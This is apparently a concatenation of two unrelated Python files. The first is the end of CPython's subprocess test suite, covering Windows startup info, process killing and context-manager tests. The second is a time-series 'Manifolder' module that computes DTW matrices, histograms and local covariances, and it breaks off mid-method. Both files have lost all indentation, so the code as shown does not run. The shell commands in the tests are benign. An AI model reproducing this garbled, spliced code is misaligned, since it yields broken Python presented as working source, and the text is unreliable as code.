# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = [sys.executable, '-c', 'pass']
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
preexec_fn=lambda: 1)
@support.cpython_only
def test_issue31471(self):
# There shouldn't be an assertion failure in Popen() in case the env
# argument has a bad keys() method.
class BadEnv(dict):
keys = None
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], env=BadEnv())
def test_close_fds(self):
# close file descriptors
rc = subprocess.call([sys.executable, "-c",
"import sys; sys.exit(47)"],
close_fds=True)
self.assertEqual(rc, 47)
def test_close_fds_with_stdio(self):
import msvcrt
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
handles = []
for fd in fds:
os.set_inheritable(fd, True)
handles.append(msvcrt.get_osfhandle(fd))
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
int(stdout.strip()) # Check that stdout is an integer
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# The same as the previous call, but with an empty handle_list
handle_list = []
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handle_list}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=True)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 1)
self.assertIn(b"OSError", stderr)
# Check for a warning due to using handle_list and close_fds=False
with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": handles[:]}
p = subprocess.Popen([sys.executable, "-c",
"import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
startupinfo=startupinfo, close_fds=False)
stdout, stderr = p.communicate()
self.assertEqual(p.returncode, 0)
def test_empty_attribute_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_empty_handle_list(self):
startupinfo = subprocess.STARTUPINFO()
startupinfo.lpAttributeList = {"handle_list": []}
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen(["set"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertIn(b"physalis", p.stdout.read())
def test_shell_encodings(self):
# Run command through the shell (string)
for enc in ['ansi', 'oem']:
newenv = os.environ.copy()
newenv["FRUIT"] = "physalis"
p = subprocess.Popen("set", shell=1,
stdout=subprocess.PIPE,
env=newenv,
encoding=enc)
with p:
self.assertIn("physalis", p.stdout.read(), enc)
def test_call_string(self):
# call() function with string argument on Windows
rc = subprocess.call(sys.executable +
' -c "import sys; sys.exit(47)"')
self.assertEqual(rc, 47)
def _kill_process(self, method, *args):
# Some win32 buildbots raise EOFError if stdin is inherited
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
returncode = p.wait()
self.assertNotEqual(returncode, 0)
def _kill_dead_process(self, method, *args):
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
sys.exit(42)
"""],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
with p:
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
rc = p.wait()
self.assertEqual(rc, 42)
def test_send_signal(self):
self._kill_process('send_signal', signal.SIGTERM)
def test_kill(self):
self._kill_process('kill')
def test_terminate(self):
self._kill_process('terminate')
def test_send_signal_dead(self):
self._kill_dead_process('send_signal', signal.SIGTERM)
def test_kill_dead(self):
self._kill_dead_process('kill')
def test_terminate_dead(self):
self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
class RecordingPopen(subprocess.Popen):
"""A Popen that saves a reference to each instance for testing."""
instances_created = []
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.instances_created.append(self)
@mock.patch.object(subprocess.Popen, "_communicate")
def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
**kwargs):
"""Fake a SIGINT happening during Popen._communicate() and ._wait().
This avoids the need to actually try and get test environments to send
and receive signals reliably across platforms. The net effect of a ^C
happening during a blocking subprocess execution which we want to clean
up from is a KeyboardInterrupt coming out of communicate() or wait().
"""
mock__communicate.side_effect = KeyboardInterrupt
try:
with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
# We patch out _wait() as no signal was involved so the
# child process isn't actually going to exit rapidly.
mock__wait.side_effect = KeyboardInterrupt
with mock.patch.object(subprocess, "Popen",
self.RecordingPopen):
with self.assertRaises(KeyboardInterrupt):
popener([sys.executable, "-c",
"import time\ntime.sleep(9)\nimport sys\n"
"sys.stderr.write('\\n!runaway child!\\n')"],
stdout=subprocess.DEVNULL, **kwargs)
for call in mock__wait.call_args_list[1:]:
self.assertNotEqual(
call, mock.call(timeout=None),
"no open-ended wait() after the first allowed: "
f"{mock__wait.call_args_list}")
sigint_calls = []
for call in mock__wait.call_args_list:
if call == mock.call(timeout=0.25): # from Popen.__init__
sigint_calls.append(call)
self.assertLessEqual(mock__wait.call_count, 2,
msg=mock__wait.call_args_list)
self.assertEqual(len(sigint_calls), 1,
msg=mock__wait.call_args_list)
finally:
# cleanup the forgotten (due to our mocks) child process
process = self.RecordingPopen.instances_created.pop()
process.kill()
process.wait()
self.assertEqual([], self.RecordingPopen.instances_created)
def test_call_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)
def test_run_keyboardinterrupt_no_kill(self):
self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)
def test_context_manager_keyboardinterrupt_no_kill(self):
def popen_via_context_manager(*args, **kwargs):
with subprocess.Popen(*args, **kwargs) as unused_process:
raise KeyboardInterrupt # Test how __exit__ handles ^C.
self._test_keyboardinterrupt_no_kill(popen_via_context_manager)
def test_getoutput(self):
self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
(0, 'xyzzy'))
# we use mkdtemp in the next line to create an empty directory
# under our exclusive control; from that, we can invent a pathname
# that we _know_ won't exist. This is guaranteed to fail.
dir = None
try:
dir = tempfile.mkdtemp()
name = os.path.join(dir, "foo")
status, output = subprocess.getstatusoutput(
("type " if mswindows else "cat ") + name)
self.assertNotEqual(status, 0)
finally:
if dir is not None:
os.rmdir(dir)
def test__all__(self):
"""Ensure that __all__ is populated properly."""
intentionally_excluded = {"list2cmdline", "Handle"}
exported = set(subprocess.__all__)
possible_exports = set()
import types
for name, value in subprocess.__dict__.items():
if name.startswith('_'):
continue
if isinstance(value, (types.ModuleType,)):
continue
possible_exports.add(name)
self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
"Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
def setUp(self):
self.orig_selector = subprocess._PopenSelector
subprocess._PopenSelector = selectors.SelectSelector
ProcessTestCase.setUp(self)
def tearDown(self):
subprocess._PopenSelector = self.orig_selector
ProcessTestCase.tearDown(self)
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
def setUp(self):
super().setUp()
f, fname = tempfile.mkstemp(".py", "te st")
self.fname = fname.lower ()
os.write(f, b"import sys;"
b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
)
os.close(f)
def tearDown(self):
os.remove(self.fname)
super().tearDown()
def with_spaces(self, *args, **kwargs):
kwargs['stdout'] = subprocess.PIPE
p = subprocess.Popen(*args, **kwargs)
with p:
self.assertEqual(
p.stdout.read ().decode("mbcs"),
"2 [%r, 'ab cd']" % self.fname
)
def test_shell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"), shell=1)
def test_shell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)
def test_noshell_string_with_spaces(self):
# call() function with string argument with spaces on Windows
self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
"ab cd"))
def test_noshell_sequence_with_spaces(self):
# call() function with sequence argument with spaces on Windows
self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
def test_pipe(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write('stdout');"
"sys.stderr.write('stderr');"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
self.assertEqual(proc.stdout.read(), b"stdout")
self.assertStderrEqual(proc.stderr.read(), b"stderr")
self.assertTrue(proc.stdout.closed)
self.assertTrue(proc.stderr.closed)
def test_returncode(self):
with subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(100)"]) as proc:
pass
# __exit__ calls wait(), so the returncode should be set
self.assertEqual(proc.returncode, 100)
def test_communicate_stdin(self):
with subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.exit(sys.stdin.read() == 'context')"],
stdin=subprocess.PIPE) as proc:
proc.communicate(b"context")
self.assertEqual(proc.returncode, 1)
def test_invalid_args(self):
with self.assertRaises(NONEXISTING_ERRORS):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
def test_broken_pipe_cleanup(self):
"""Broken pipe error should not prevent wait() (Issue 21619)"""
proc = subprocess.Popen([sys.executable, '-c', 'pass'],
stdin=subprocess.PIPE,
bufsize=support.PIPE_MAX_SIZE*2)
proc = proc.__enter__()
# Prepare to send enough data to overflow any OS pipe buffering and
# guarantee a broken pipe error. Data is held in BufferedWriter
# buffer until closed.
proc.stdin.write(b'x' * support.PIPE_MAX_SIZE)
self.assertIsNone(proc.returncode)
# EPIPE expected under POSIX; EINVAL under Windows
self.assertRaises(OSError, proc.__exit__, None, None, None)
self.assertEqual(proc.returncode, 0)
self.assertTrue(proc.stdin.closed)
if __name__ == "__main__":
unittest.main()
|
main.py
|
__all__ = (
'Manifolder',
)
import numpy as np
from numpy.linalg import inv
from numpy.linalg import pinv
from sklearn.cluster import KMeans
from manifolder import helper as mh
try:
from multiprocessing import Pool, TimeoutError, Lock#, Process, Manager
from manifolder.parallel import workers
enable_multiprocessing = True
except ImportError:
enable_multiprocessing = False
import functools
from functools import partial
import time
import sys
import os
import math
#import tslearn
#from tslearn.metrics import dtw
#from tslearn.metrics import cdist_dtw
import sklearn_extra
from sklearn_extra.cluster import KMedoids
import dtw
#from pyclustering.utils import calculate_distance_matrix
from pyclustering.cluster.kmedoids import kmedoids
import random
from random import sample
print = functools.partial(print, flush=True)
def test():
print('test function called')
# class LinearRegression(MultiOutputMixin, RegressorMixin, LinearModel):
class Manifolder():
"""
Implementation of Empirical Intrinsic Geometry (EIG) for time-series.
Parameters
----------
dim : int, optional, default 3
The dimension of the underlying manifold.
This will typically be somewhat smaller than the dimension of the data
H: int, optional, default 40
Window length (in samples) used for histogram / empirical density estimation
step_size: int, optional, default 5
Stride (in samples) between consecutive histogram windows; windows overlap when step_size < H
nbins: int, optional, default 5
Number of bins to use when creating histogram
See Also
--------
Notes
-----
Examples
--------
>>> import numpy as np
>>> manifolder = Manifolder()
>>> psi = manifolder.fit_transform(data)
"""
def __init__(self, dim=3, H=40, step_size=5, nbins=5, distance_measure=None, ncov=40, n_jobs=None, num_rdims=10):
self.Dim = dim
self.H = H
self.stepSize = step_size
self.nbins = nbins
self.distance_measure = distance_measure
self.ncov = ncov
self.num_rdims = num_rdims
def fit_transform(self, X, parallel=False, dtw=None, dtw_downsample_factor=1, dtw_dims=None):
"""
Fit (find the underlying manifold).
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Training data
Returns
-------
Psi : ndarray
The intrinsic embedding (also stored as self.Psi). When a dtw mode is
selected, the method returns None and the DTW distance matrix is stored
on the instance instead.
"""
### IMPORTANT - sklearn, and Python / data science in general use the convention where
###
### data = [samples, features]
###
### manifolder takes the data in this semi-standard format, but internally uses the
### 'observations as columns' format from the original MATLAB
###
# print('fit was called, not yet implemented')
self._load_data(X)
if parallel and enable_multiprocessing:
l = Lock()
pool = Pool(initializer=workers.parallel_init, initargs=(l,))#, maxtasksperchild=1)
self._histograms_parallel(process_pool=pool)
if dtw == "stack":
self.dtw_matrix_parallel(self.get_snippets(downsample_factor=dtw_downsample_factor,
stack=True, stack_dimensions=dtw_dims), process_pool=pool)
elif dtw == "sum":
pass
#self.dtw_matrix_multidim_sum_parallel(self.zs, dtw_dims)
else:
self._covariances_parallel(process_pool=pool)
self._embedding_parallel(process_pool=pool)
pool.close()
pool.join()
if dtw is not None:
return
else:
if parallel:
print("Unable to use multiprocessing, falling back to single-threaded mode")
self._histograms_overlap()
if dtw == "stack":
self.dtw_matrix(self.get_snippets(downsample_factor=dtw_downsample_factor,
stack=True, stack_dimensions=dtw_dims))
return
elif dtw == "sum":
self.dtw_matrix_multidim_sum(self.z, dtw_dims)
return
elif dtw == "raw":
self.dtw_matrix_multidim(self.z)
return
elif dtw == "zscore":
self.dtw_matrix(self.zscore_singledim(self.get_snippets(downsample_factor=dtw_downsample_factor,
stack=True, stack_dimensions=dtw_dims)))
return
elif dtw == "zscore_mdim":
self.dtw_matrix_multidim(self.zscore_multidim(self.z))
return
else:
self._covariances()
self._embedding()
return self.Psi  # the final embedding is in Psi
# self._clustering()
# sklearn fit() tends to return self; here the embedding is returned instead
# return self  (unreachable after the return above)
def _load_data(self, data):
""" loads the data, in [samples, nfeatures]
NOTE - internally, data is stored in the
format used in the original code """
if not isinstance(data, list):
self.z = [data.T] # creates a list of length 1
else:
n = len(data)
for snip in range(n):
if snip == 0:
self.z = [data[snip].T]
else:
self.z.append(data[snip].T) # time is a function of the columns, internally
self.N = self.z[0].shape[0] # will be 8, the number of features
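# Example of the internal layout (illustrative): an input snippet of shape
# (n_samples, n_features) = (1000, 8) is stored as self.z[k] with shape (8, 1000),
# i.e. features as rows and time along the columns, so self.N == 8.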
#Returns a numpy array of all windows for dtw
def get_windows(self, downsample_factor=1):
i_range = int(np.floor(self.z[0].shape[1] - self.H) / self.stepSize)
n = len(self.z) * i_range
# preallocate one row per window, across all snippets
windows = np.zeros((n, self.H // downsample_factor))
for snip in range(len(self.z)):
z = self.z[snip]
# currently only uses the first dimension; further dimensions can be added through stacking
# (e.g. series = z[dim, :] to grab a different row of data)
series = z[0, :]
for i in range(i_range):
windows[snip * i_range + i, :] = self.downsample(series[i * self.stepSize:i * self.stepSize + self.H], downsample_factor)
return windows
#returns a 2d numpy array of all snippets. If stack is left false, only the first
# dimension of the data will be used. If true, it will stack the dimensions
# specified in the iterable stack_dimensions, or all dimensions if stack_dimensions
# is left as None, by interleaving the data points from each dimension
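# e.g. (illustrative) get_snippets(downsample_factor=2, stack=True, stack_dimensions=(0, 3))
# returns an array of shape (n_snippets, (data_len // 2) * 2) whose rows interleave the
# downsampled samples of dimensions 0 and 3 of each snippet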
def get_snippets(self, downsample_factor=1, stack=False, stack_dimensions=None):
data_len = self.z[0].shape[1]
if not stack:
num_dims = 1
stack_dimensions = (0,)
if stack_dimensions is None:
num_dims = self.z[0].shape[0]
stack_dimensions = range(num_dims)
else:
num_dims = len(stack_dimensions)
all_snippets = np.zeros((len(self.z), (data_len // downsample_factor) * num_dims))
if stack:
print("stacking " + str(num_dims) + " dimensions")
for snip in range(len(self.z)):
z = self.z[snip]
dims = np.zeros((num_dims, data_len // downsample_factor))
for d in range(num_dims):
dims[d,:] = self.downsample(z[d,:], downsample_factor)[:]
all_snippets[snip,:] = self.stack(dims)[:]
print("done stacking")
else:
for snip in range(len(self.z)):
z = self.z[snip]
all_snippets[snip,:] = self.downsample(z[0, :], downsample_factor)
print(all_snippets.shape)
return all_snippets
def downsample(self, x, skip):
# keep every `skip`-th sample, truncated to floor(len(x) / skip) values so the
# result matches the buffers preallocated by the callers (length // skip entries)
x = np.asarray(x)
length = x.shape[0]
return x[:(length // skip) * skip:skip].astype(float)
def stack(self, dims):
#transposing results in the data points from each dimension being interwoven.
# to connect each dimension end to end, simply remove the call to np.transpose
return np.transpose(dims).flatten()
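# Illustrative example of the interleaving performed by stack():
#   dims = np.array([[a0, a1, a2],
#                    [b0, b1, b2]])
#   stack(dims) -> array([a0, b0, a1, b1, a2, b2])
# removing the np.transpose call would instead give [a0, a1, a2, b0, b1, b2]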
def dtw_matrix(self, data):
# pairwise DTW distances between the rows of `data` (symmetric, zero diagonal);
# note the result is stored as self.dtw_matrix, which shadows this method on the instance
self.dtw_matrix = np.zeros((data.shape[0], data.shape[0]))
print(self.dtw_matrix.shape)
start_time = time.time()
for i in range(data.shape[0]):
for j in range(i):
dtw_result = dtw.dtw(data[i,:], data[j,:])#, window_type="sakoechiba", window_args={"window_size":2})
self.dtw_matrix[i,j] = dtw_result.distance
self.dtw_matrix[j,i] = dtw_result.distance
elapsed_time = time.time() - start_time
print('DTW done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print(self.dtw_matrix)
return self.dtw_matrix
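# The symmetric matrix returned above can be fed to a clustering routine that accepts
# precomputed distances, e.g. (illustrative sketch, using the KMedoids imported above):
#   D = m.dtw_matrix(snippets)
#   labels = KMedoids(n_clusters=7, metric="precomputed", init="random").fit_predict(D)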
def zscore_singledim(self, data):
#subtract mean and divide by standard deviation
new_data = np.zeros(data.shape)
for i in range(data.shape[0]):
new_data[i,:] = (data[i,:] - np.mean(data[i,:])) / np.std(data[i,:])
return new_data
def zscore_multidim(self, data):
arr = []
for i in range(len(data)):
snippet = data[i]
new_data = np.zeros(snippet.shape)
for j in range(snippet.shape[0]):
new_data[j,:] = (snippet[j,:] - np.mean(snippet[j,:])) / np.std(snippet[j,:])
arr.append(new_data)
return arr
def dtw_matrix_multidim(self, data):
# pairwise DTW distances between the multi-dimensional snippets in the list `data`
self.dtw_matrix = np.zeros((len(data), len(data)))
print(self.dtw_matrix.shape)
start_time = time.time()
for i in range(len(data)):
for j in range(i):
dtw_result = dtw.dtw(data[i], data[j])#, window_type="sakoechiba", window_args={"window_size":2})
self.dtw_matrix[i,j] = dtw_result.distance
self.dtw_matrix[j,i] = dtw_result.distance
elapsed_time = time.time() - start_time
print('DTW done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print(self.dtw_matrix)
return self.dtw_matrix
def dtw_matrix_multidim_sum(self, data, dims=None):
# sum of per-dimension DTW distances over the dimensions listed in `dims`
if dims is None:
dims = tuple(range(data[0].shape[0]))
print(dims)
start_time = time.time()
self.dtw_matrix = np.zeros((len(data), len(data)))
for dim in dims:
single_dim = self.get_snippets(stack=True, stack_dimensions=(dim,))
print(self.dtw_matrix.shape)
for i in range(single_dim.shape[0]):
for j in range(i):
dtw_result = dtw.dtw(single_dim[i,:], single_dim[j,:])#, window_type="sakoechiba", window_args={"window_size":2})
self.dtw_matrix[i,j] += dtw_result.distance
self.dtw_matrix[j,i] += dtw_result.distance
elapsed_time = time.time() - start_time
print('DTW done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print(self.dtw_matrix)
return self.dtw_matrix
def dtw_call(self, x, y):
#here is where you can change dtw params for KMedoids clustering
dtw_result = dtw.dtw(x,y)#, window_type="sakoechiba", window_args={"window_size":2})
return dtw_result.distance
def dtw_clustering_skl(self, num_clusters=7):
all_windows = []
all_snippets = []
for snip in range(10):#len(self.z)):
z = self.z[snip]
#for dim in range(self.N):
series = z[1, :] # z[dim, :] grab a row of data
all_snippets.append(series)
i_range = int(np.floor(z.shape[1] - self.H) / self.stepSize)
for i in range(i_range):
#you can add in the downsampling here
all_windows.append(self.downsample(series[i * self.stepSize:i * self.stepSize + self.H], 10))
func = self.dtw_call
print("dtw clustering on windows ... ", end="")
start_time = time.time()
kmedoids = KMedoids(n_clusters = num_clusters, metric=func, init="random").fit(all_windows)
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print("dtw cluster centers:")
print(kmedoids.cluster_centers_)
print("dtw cluster labels:")
print(kmedoids.labels_)
self.kmedoids_windows = kmedoids
print("dtw clustering on full snippets ... ", end="")
start_time = time.time()
kmedoids = KMedoids(n_clusters = num_clusters, metric=func, init="random").fit(all_snippets)
elapsed_time = time.time() - start_time
print('done in ', str(np.round(elapsed_time, 2)), 'seconds!')
print("dtw cluster centers:")
print(kmedoids.cluster_centers_)
print("dtw cluster labels:")
print(kmedoids.labels_)
self.kmedoids_snippets = kmedoids
return kmedoids
def _histograms_overlap(self):
n = len(self.z)
hist_bins = mh.histogram_bins_all_snips(self.z, self.nbins)
# JD
        # z_hist = [] # will build up list of histograms, one per snippet
# for z in self.z:
# z is a single snippet here, and self.z is the full list of all snippets
for snip in range(n):
## Concatenate 1D histograms (marginals) of each sensor in short windows
            z_hist_list = []  # in Python, lists are sometimes easier than concatenate
z = self.z[snip]
print('calculating histograms for snip ', snip, ' of ', n, ' (dim ', self.N ,' timeseries) ', end='')
# for dim=1:N
for dim in range(self.N): # loop run standard Python indexing, starting at dim = 0
print('.', end='')
series = z[dim, :] # grab a row of data
# NOTE, MATLAB and python calculate histograms differently
# MATLAB uses nbins values, as bins centerpoints, and
# Python uses nbins+1 values, to specify the bin endpoints
# note, hist_bins will always be [0 .25 .5 .75 1], in MATLAB
# equivalent for python hist is
# [-0.12 0.128 0.376 0.624 0.872 1.12 ]
# hist_bins = mh.histogram_bins_centered(series, self.nbins)
z_hist_dim_list = []
# for i=1:floor((size(z,2)-H)/stepSize)
i_range = int(np.floor(z.shape[1] - self.H) / self.stepSize)
for i in range(i_range):
# interval = z(dim, 1 + (i - 1) * stepSize: (i - 1) * stepSize + H);
interval = series[i * self.stepSize:i * self.stepSize + self.H]
# take the histogram here, and append it ... should be nbins values
# first value returned by np.histogram the actual histogram
#
                    # NOTE!!! these bins do not overlap completely with the MATLAB version,
# but are roughly correct ... probably exact boundaries are not the same,
# would need to look into this ...
#
hist = np.histogram(interval, hist_bins[dim])[0]
z_hist_dim_list.append(hist)
# convert from a list, to array [nbins x (series.size/stepSize?)]
z_hist_dim = np.array(z_hist_dim_list).T
# z_hist = [z_hist; z_hist_dim];
z_hist_list.append(z_hist_dim)
# JD
            # z_hist.append(np.concatenate(z_hist_list))
# convert from list back to numpy array
if snip == 0:
self.z_hist = [np.concatenate(z_hist_list)]
self.snip_number = snip*np.ones(self.z_hist[snip].shape[1])
else:
self.z_hist.append(np.concatenate(z_hist_list))
self.snip_number = np.append(self.snip_number,snip*np.ones(self.z_hist[snip].shape[1]))
print(' done') # prints 'done' after each snip
def _covariances(self):
#
#
## Configuration
# ncov = 10 # (previous value) size of neighborhood for covariance
# ncov = 40 # size of neighborhood for covariance
# ncov is passed in, above
n = len(self.z_hist)
for snip in range(n):
print('computing local covariances for snip ', snip, ' of ', n, end='')
z_hist = self.z_hist[snip]
z_mean = np.zeros_like(z_hist) # Store the mean histogram in each local neighborhood
# NOTE, original matlab call should have used N * nbins ... length(hist_bins) works fine in MATLAB,
# but in python hist_bins has one more element than nbins, since it defines the boundaries ...
# inv_c = zeros(N*length(hist_bins), N*length(hist_bins), length(z_hist))
# Store the inverse covariance matrix of histograms in each local neighborhood
inv_c = np.zeros((self.N * self.nbins, self.N * self.nbins, z_hist.shape[1]))
# precalculate the values over which i will range ...
# this is like 40 to 17485 (inclusive) in python
# 41 to 17488 in MATLAB ... (check?)
irange = range(self.ncov, z_hist.shape[1] - self.ncov - 1)
# instead of waitbar, print .......... to the screen during processing
waitbar_increments = int(irange[-1] / 10)
for i in irange:
if i % waitbar_increments == 0:
print('.', end='')
# not sure of the final number boundary for the loop ...
# win = z_hist(:, i-ncov:i+ncov-1)
# TODO - Alex, is this the right range in MATLAB?
win = z_hist[:,
i - self.ncov:i + self.ncov] # python, brackets do not include end, in MATLAB () includes end
###
### IMPORTANT - the input to the cov() call in MATLAB is TRANSPOSED compared to numpy
### cov(win.T) <=> np.cov(win)
###
#
# # Python example
# A = np.array([[0, 1 ,2],[3, 4, 5]])
# print(A)
# print(np.cov(A.T))
#
# % MATLAB example
# >> A = [[0 1 2];[3 4 5]]
# >> cov(A)
#
# TODO - lol, don't use 40x40, use a different number of bins, etc.
c = np.cov(win)
# De-noise via projection on "known" # of dimensions
# [U S V] = svd(c); # matlab
# python SVD looks very similar to MATLAB:
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.linalg.svd.html
# factors a such that a == U @ S @ Vh
# Compute full svd
# U, S, V = mh.svd_like_matlab(c)
# Compute largest singular vectors only
U, S, V = mh.svds_like_matlab(c, self.Dim)
# inverse also works the same in Python as MATLAB ...
# matlab:
# >> X = [1 0 2; -1 5 0; 0 3 -9]
# >> Y = inv(X)
#
# 0.8824 -0.1176 0.1961
# 0.1765 0.1765 0.0392
# 0.0588 0.0588 -0.0980
#
# Python:
# X = np.array([[1, 0, 2],[-1, 5, 0],[0, 3, -9]])
# Y = inv(X)
#
# [[ 0.8824 -0.1176 0.1961]
# [ 0.1765 0.1765 0.0392]
# [ 0.0588 0.0588 -0.098 ]]
# inv_c(:,:,i) = U(:,1:Dim) * inv(S(1:Dim,1:Dim)) * V(:,1:Dim)' # matlab
inv_c[:, :, i] = U[:, :self.Dim] @ pinv(S[:self.Dim, :self.Dim]) @ V[:, :self.Dim].T # NICE!
# z_mean(:, i) = mean(win, 2); # matlab
z_mean[:, i] = np.mean(win, 1)
# append z_mean and inv_c as next rows of mat
if snip == 0:
self.z_mean = z_mean
self.inv_c = inv_c
else:
self.z_mean = np.append(self.z_mean, z_mean, axis=1)
self.inv_c = np.append(self.inv_c, inv_c, axis=2)
print(' done') # prints done at the end of each snip
def _embedding(self):
###
### Part I
###
## Configuration
# the variable m defines some subset of the data, to make computation faster;
# this could be various values (10% of the data, all the data, etc.), as long
# as it is not GREATER than the length of data.
# For the smallest change, setting to min 4000 or the data size
# m = 4000 # starting point for sequential processing/extension
#
        # TODO - m allows you to sample various sections of the manifold, rather than looking at
# all points to all points
# the random points can come from the different chunks as well?
# ... for ease of coding, the datastructure could be back to 2D data
m = np.min((4000, self.z_mean.shape[1]))
print('using', m, 'for variable m')
data = self.z_mean.T # set the means as the input set
M = data.shape[0]
# Choose subset of examples as reference
# this is 'take m (4000) random values from z_mean, and sort them
# subidx = sort(randperm(size(z_mean, 2), m))
        # Choose first m examples as reference (commented out; don't do this)
# subidx = 1:m;
